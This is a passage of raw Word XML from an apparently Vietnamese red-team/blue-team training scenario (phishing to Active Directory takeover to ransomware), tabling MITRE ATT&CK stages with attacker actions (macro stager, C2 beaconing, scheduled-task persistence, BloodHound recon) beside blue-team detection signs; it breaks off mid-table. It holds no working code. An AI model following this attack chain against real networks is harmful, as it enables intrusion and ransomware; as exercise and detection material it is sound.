      <w:r w:rsidRPr="007D0621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F323FFA" wp14:editId="4F9F4C90">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>133251</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>97342</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4904990" cy="7333081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="880486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86374" name="Picture 880486374"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4904990" cy="7333081"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE88E95" w14:textId="5AED7382" w:rsidR="33F92B36" w:rsidRDefault="33F92B36">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C402E14" w14:textId="7D1515D3" w:rsidR="00E4C0B0" w:rsidRDefault="007D0621" w:rsidP="5B74E941">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0646B">
        <w:rPr>
          <w:color w:val="EE0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kịch bản 2</w:t>
      </w:r>
      <w:r w:rsidR="7A6BA895" w:rsidRPr="00C0646B">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>: Phishing &gt; Chiếm quyền Active Dir</w:t>
      </w:r>
      <w:r w:rsidR="538C36B4" w:rsidRPr="00C0646B">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>ectory &gt; Ransomeware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081CA662" w14:textId="34C8304A" w:rsidR="007D0621" w:rsidRPr="007D0621" w:rsidRDefault="007D0621" w:rsidP="007D0621">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0621">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SƠ ĐỒ LUỒNG TẤN CÔNG:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECD344D" w14:textId="2867D883" w:rsidR="410002FF" w:rsidRDefault="410002FF" w:rsidP="00CA4A0D">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F611971" wp14:editId="6DB48CF1">
            <wp:extent cx="5724525" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="949694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94963" name="Picture 949694963"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724525" cy="2028825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B4F17" w14:textId="77777777" w:rsidR="007D0621" w:rsidRDefault="007D0621" w:rsidP="00CA4A0D">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393C738B" w14:textId="515EB6E1" w:rsidR="007D0621" w:rsidRPr="007D0621" w:rsidRDefault="007D0621" w:rsidP="00CA4A0D">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0621">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CHI TIẾT CÁC GIAI ĐOẠN TẤN CÔNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="972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720"/>
        <w:gridCol w:w="2138"/>
        <w:gridCol w:w="4012"/>
        <w:gridCol w:w="2850"/>
      </w:tblGrid>
      <w:tr w:rsidR="5B74E941" w14:paraId="625FFD5A" w14:textId="77777777" w:rsidTr="3FA87A0B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E94D7DA" w14:textId="4E6C38CD" w:rsidR="3128ECDB" w:rsidRDefault="3128ECDB" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2138" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="29674291" w14:textId="1C80AAC8" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">Giai đoạn </w:t>
            </w:r>
            <w:r w:rsidR="4EB9D560" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4012" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="03E32DA7" w14:textId="79C09371" w:rsidR="00DECE82" w:rsidRDefault="00DECE82" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Hành động của Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4A54516D" w14:textId="32A66CC2" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">Dấu hiệu phát hiện </w:t>
            </w:r>
            <w:r w:rsidR="7983E8C6" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>(Blue Team)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="5B74E941" w14:paraId="6192B790" w14:textId="77777777" w:rsidTr="3FA87A0B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F79A2B0" w14:textId="7BE01292" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2138" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E2DD47D" w14:textId="5D4594AB" w:rsidR="2521A19E" w:rsidRDefault="2521A19E" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Access </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ED659B0" w14:textId="0F4FAC3B" w:rsidR="2521A19E" w:rsidRDefault="2521A19E" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">(Truy cập ban đầu) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5700E8C3" w14:textId="58899CA3" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>T1566.001</w:t>
            </w:r>
            <w:r w:rsidR="104DECD4" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>T1204.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4012" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="58DA40CF" w14:textId="31D8D90B" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:r w:rsidRPr="3FA87A0B">
              <w:t>Email phishing kèm tài liệu Office; macro VBA tải và chạy stager trên User WS #1 (patient zero).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="24B22E67" w14:textId="67633EF9" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Winword.exe sinh powershell.exe (Sysmon ID 1); ASR rule; email gateway.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="5B74E941" w14:paraId="5BE070DF" w14:textId="77777777" w:rsidTr="3FA87A0B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5A29EA7F" w14:textId="1552599E" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2138" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="66E58EE0" w14:textId="75A9E389" w:rsidR="53CF6A3F" w:rsidRDefault="53CF6A3F" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Command and Control &amp; Persistence</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="564E544B" w14:textId="1F54BE99" w:rsidR="53CF6A3F" w:rsidRDefault="53CF6A3F" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>(Kiểm soát và duy trì)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="087A0C78" w14:textId="01F6B0CB" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
            <w:r w:rsidR="6FC8BFE2" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> T1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4012" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2211686F" w14:textId="3D302731" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:r w:rsidRPr="3FA87A0B">
              <w:t>Beacon HTTPS về máy chủ C2 (Sliver/Mythic); tạo Scheduled Task/Run key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="777B7EAA" w14:textId="2F1F82DF" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Beaconing đều có jitter (Zeek/proxy); tạo task bất thường (4698).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="5B74E941" w14:paraId="4526D19A" w14:textId="77777777" w:rsidTr="3FA87A0B">
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3D0D80C2" w14:textId="691709DA" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2138" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38092919" w14:textId="4542540A" w:rsidR="14F2142C" w:rsidRDefault="14F2142C" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Internal Domain Reconnaissance</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="646627C1" w14:textId="4E57BD2C" w:rsidR="14F2142C" w:rsidRDefault="14F2142C" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="797D9491" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Trinh sát hệ thống và tài khoản trong miền AD</w:t>
            </w:r>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C55C01E" w14:textId="0A4357E8" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>T1087</w:t>
            </w:r>
            <w:r w:rsidR="63639C51" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>T1482</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4012" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="62758940" w14:textId="01CB727A" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:r w:rsidRPr="3FA87A0B">
              <w:t>Chạy BloodHound/SharpHound tìm đường tới Domain Admins và ACL cấu hình sai.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6166153C" w14:textId="6E74290E" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Truy vấn LDAP/SAMR bất thường; khối lượng query AD tăng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="5B74E941" w14:paraId="36E6575B" w14:textId="77777777" w:rsidTr="3FA87A0B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="37028556" w14:textId="47E53EA2" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2138" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="627AA269" w14:textId="55EBE652" w:rsidR="7D11B4F9" w:rsidRDefault="7D11B4F9" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="211D4EC5" w14:textId="4940F4EF" w:rsidR="7D11B4F9" w:rsidRDefault="7D11B4F9" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(Thu thập và khai thác thông tin xác thực)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="672FFBB6" w14:textId="1139C382" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
